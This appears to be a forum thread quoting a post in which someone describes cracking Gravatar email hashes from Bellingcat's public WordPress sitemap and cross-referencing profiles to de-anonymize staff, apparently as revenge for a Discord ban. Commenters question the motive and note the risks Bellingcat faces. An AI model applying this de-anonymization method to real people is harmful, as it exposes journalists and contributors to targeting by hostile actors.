What I found: 173 Gravatar email hashes sitting in Bellingcat’s public
WordPress sitemap, completely unprotected.
I cracked 89 of those hashes back into the original email addresses.
I pulled 32 full Gravatar profiles containing real names, locations,
social media accounts, and bios.
I scraped all 1,318 published articles for author intelligence
and cross-referenced everything against Gravatar’s public API.
Over half of Bellingcat’s staff and contributors were de-anonymized
from a single sitemap.
Why the author says they did it:
I was kicked from their Discord for posting a gif in an inactive
channel. [Non mod users] lectured me about rules I hadn’t broken,
and within minutes I was banned. The reason logged by their system?
"Discord ToS/Threats."
Bellingcat operates a crossban system that propagates bans across
affiliated OSINT communities. I was automatically banned from
Project Owl: A OSINT Community server I had never interacted with.
Due to our increasingly dead internet, I've become a bit more sympathetic to heavy handed moderation (in general). Especially if the moderation team is reachable and reasonable. In this article, I see no indication the author reached out anyone at Bellingcat about his ban.
Further, Bellingcat exists in a space where they push back against some of the most powerful entities in Earth. I assume that brings security nuances I am not aware of.
WarOnPrivacy•1h ago
Further, Bellingcat exists in a space where they push back against some of the most powerful entities in Earth. I assume that brings security nuances I am not aware of.